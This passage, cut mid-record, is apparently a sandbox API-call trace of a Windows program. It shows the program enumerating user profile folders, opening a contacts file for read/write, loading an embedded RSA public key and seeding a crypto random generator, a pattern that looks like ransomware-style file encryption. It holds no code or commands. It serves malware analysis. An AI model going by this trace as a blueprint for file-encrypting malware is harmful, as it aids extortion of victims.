wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.897] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.898] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.898] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.898] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3c53a50, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3c53a50, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0228.898] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.898] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.898] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0228.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0228.899] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=1178) returned 1 [0228.899] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0228.902] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.902] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0229.711] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x49a, lpOverlapped=0x0) returned 1 [0229.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0229.712] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0229.713] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0229.713] CryptHashData (hHash=0x33f0408, pbData=0x6962b0, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0229.713] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0229.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c8740 [0229.713] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c8740, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c8740, pdwDataLen=0x39afa54) returned 1 [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.714] SetLastError (dwErrCode=0x0) [0229.714] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.715] SetLastError (dwErrCode=0x0) [0229.715] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] GetLastError () returned 0x0 [0229.716] SetLastError (dwErrCode=0x0) [0229.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0229.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0229.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8740 | out: hHeap=0x620000) returned 1 [0229.717] CryptDestroyHash (hHash=0x33f0408) returned 1 [0229.717] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0229.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6962b0 | out: hHeap=0x620000) returned 1 [0229.717] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0229.718] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0229.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0229.718] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0229.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0229.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0229.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a0) returned 0x3b7a060 [0229.719] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0229.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0229.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x6962b0 [0229.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0229.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x346fd28 [0229.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0229.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c830 [0229.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7b90 [0229.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffe70 [0229.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8720 [0229.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33ffe88 [0229.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffe58 [0229.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0229.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffe10 [0229.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8740 [0229.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33ffde0 [0229.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffdf8 [0229.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffe40 [0229.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0229.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffe28 [0229.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffea0 [0229.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffeb8 [0229.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffed0 [0229.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0229.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0229.810] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x3b7a508 [0229.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b7d818 [0229.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0229.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffed0 | out: hHeap=0x620000) returned 1 [0229.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffeb8 | out: hHeap=0x620000) returned 1 [0229.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0229.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d818 | out: hHeap=0x620000) returned 1 [0229.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffeb8 [0229.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0229.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33ffed0 [0229.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8760 [0229.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33ffea0 [0229.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0229.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x33b8188 [0229.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0229.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0229.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0229.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x6affc0 [0229.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0229.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0229.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0229.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffed0 | out: hHeap=0x620000) returned 1 [0229.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0229.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0229.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8760 | out: hHeap=0x620000) returned 1 [0229.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0229.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffeb8 | out: hHeap=0x620000) returned 1 [0229.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0229.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0229.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a508 | out: hHeap=0x620000) returned 1 [0229.932] GetCurrentThreadId () returned 0x5b4 [0229.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x190) returned 0x3b7a508 [0229.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb08 [0229.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c68 [0229.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffeb8 [0229.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0229.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x687b80 [0229.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0229.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0229.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0229.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0229.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0229.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0229.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0230.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0230.023] GetCurrentThreadId () returned 0x5b4 [0230.023] GetVersionExA (in: lpVersionInformation=0x39af380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x39af3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x39af380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0230.023] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x764d0000 [0230.024] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x77010000 [0230.024] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x74780000 [0233.880] GetProcAddress (hModule=0x74780000, lpProcName="NetStatisticsGet") returned 0x7478644f [0233.880] GetProcAddress (hModule=0x74780000, lpProcName="NetApiBufferFree") returned 0x747b13d2 [0233.881] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x39af02c | out: Buffer=0x39af02c) returned 0x0 [0233.895] GetCurrentThreadId () returned 0x5b4 [0233.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0233.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0233.952] NetApiBufferFree (Buffer=0x33e4188) returned 0x0 [0233.952] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x39af02c | out: Buffer=0x39af02c) returned 0x0 [0233.991] GetCurrentThreadId () returned 0x5b4 [0233.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0233.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0233.991] NetApiBufferFree (Buffer=0x33ecbc8) returned 0x0 [0233.991] FreeLibrary (hLibModule=0x74780000) returned 1 [0233.993] GetProcAddress (hModule=0x764d0000, lpProcName="CryptAcquireContextW") returned 0x764ddf14 [0233.994] GetProcAddress (hModule=0x764d0000, lpProcName="CryptGenRandom") returned 0x764ddfc8 [0233.994] GetProcAddress (hModule=0x764d0000, lpProcName="CryptReleaseContext") returned 0x764de124 [0233.994] CryptAcquireContextW (in: phProv=0x39af018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39af018*=0x67a770) returned 1 [0233.995] CryptGenRandom (in: hProv=0x67a770, dwLen=0x40, pbBuffer=0x39af464 | out: pbBuffer=0x39af464) returned 1 [0233.995] GetCurrentThreadId () returned 0x5b4 [0233.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0233.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0233.996] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0233.996] CryptAcquireContextW (in: phProv=0x39af018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x39af018*=0x67a770) returned 0 [0233.996] FreeLibrary (hLibModule=0x764d0000) returned 1 [0233.996] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0233.996] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0233.996] GetDesktopWindow () returned 0x10010 [0233.996] GetProcessWindowStation () returned 0x5c [0233.996] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x39aefa0 | out: pvInfo=0x0, lpnLengthNeeded=0x39aefa0) returned 0 [0233.996] GetLastError () returned 0x7a [0233.996] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x39aef80, nLength=0x10, lpnLengthNeeded=0x39aefa0 | out: pvInfo=0x39aef80, lpnLengthNeeded=0x39aefa0) returned 1 [0233.996] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x76c80000 [0233.997] GetProcAddress (hModule=0x76c80000, lpProcName="GetForegroundWindow") returned 0x76ca2320 [0233.997] GetProcAddress (hModule=0x76c80000, lpProcName="GetCursorInfo") returned 0x76cf812f [0233.997] GetProcAddress (hModule=0x76c80000, lpProcName="GetQueueStatus") returned 0x76ca3924 [0233.997] GetForegroundWindow () returned 0x1005e [0233.997] GetCurrentThreadId () returned 0x5b4 [0233.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0233.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0233.997] GetCursorInfo (in: pci=0x39af450 | out: pci=0x39af450) returned 1 [0233.997] GetQueueStatus (flags=0xbf) returned 0x0 [0233.998] GetCurrentThreadId () returned 0x5b4 [0233.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0233.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0233.998] FreeLibrary (hLibModule=0x76c80000) returned 1 [0233.998] GetProcAddress (hModule=0x77010000, lpProcName="CreateToolhelp32Snapshot") returned 0x7704735f [0233.998] GetProcAddress (hModule=0x77010000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0233.998] GetProcAddress (hModule=0x77010000, lpProcName="Heap32First") returned 0x770a5763 [0233.998] GetProcAddress (hModule=0x77010000, lpProcName="Heap32Next") returned 0x770a594e [0233.998] GetProcAddress (hModule=0x77010000, lpProcName="Heap32ListFirst") returned 0x770a5621 [0233.999] GetProcAddress (hModule=0x77010000, lpProcName="Heap32ListNext") returned 0x770a56cb [0233.999] GetProcAddress (hModule=0x77010000, lpProcName="Process32First") returned 0x77048ae7 [0233.999] GetProcAddress (hModule=0x77010000, lpProcName="Process32Next") returned 0x770488a4 [0233.999] GetProcAddress (hModule=0x77010000, lpProcName="Thread32First") returned 0x770a5b93 [0233.999] GetProcAddress (hModule=0x77010000, lpProcName="Thread32Next") returned 0x770a5c3f [0233.999] GetProcAddress (hModule=0x77010000, lpProcName="Module32First") returned 0x770a5cd9 [0234.000] GetProcAddress (hModule=0x77010000, lpProcName="Module32Next") returned 0x770a5dc2 [0234.000] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x654 [0234.009] GetTickCount () returned 0x1140925 [0234.009] Heap32ListFirst (hSnapshot=0x654, lphl=0x39af454) returned 1 [0234.010] GetCurrentThreadId () returned 0x5b4 [0234.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.010] Heap32First (lphe=0x39aefc0, th32ProcessID=0x53c, th32HeapID=0x620000) returned 1 [0234.032] GetCurrentThreadId () returned 0x5b4 [0234.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.032] Heap32Next (lphe=0x39aefc0) returned 1 [0234.050] GetTickCount () returned 0x1140944 [0234.050] GetCurrentThreadId () returned 0x5b4 [0234.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.050] Heap32Next (lphe=0x39aefc0) returned 1 [0234.069] GetTickCount () returned 0x1140954 [0234.069] GetCurrentThreadId () returned 0x5b4 [0234.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.069] Heap32Next (lphe=0x39aefc0) returned 1 [0234.093] GetTickCount () returned 0x1140973 [0234.093] GetCurrentThreadId () returned 0x5b4 [0234.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.093] Heap32Next (lphe=0x39aefc0) returned 1 [0234.119] GetTickCount () returned 0x1140992 [0234.119] GetCurrentThreadId () returned 0x5b4 [0234.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.119] Heap32Next (lphe=0x39aefc0) returned 1 [0234.137] GetTickCount () returned 0x11409a2 [0234.137] GetCurrentThreadId () returned 0x5b4 [0234.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.137] Heap32Next (lphe=0x39aefc0) returned 1 [0234.155] GetTickCount () returned 0x11409b2 [0234.155] GetCurrentThreadId () returned 0x5b4 [0234.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.155] Heap32Next (lphe=0x39aefc0) returned 1 [0234.172] GetTickCount () returned 0x11409c1 [0234.172] GetCurrentThreadId () returned 0x5b4 [0234.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 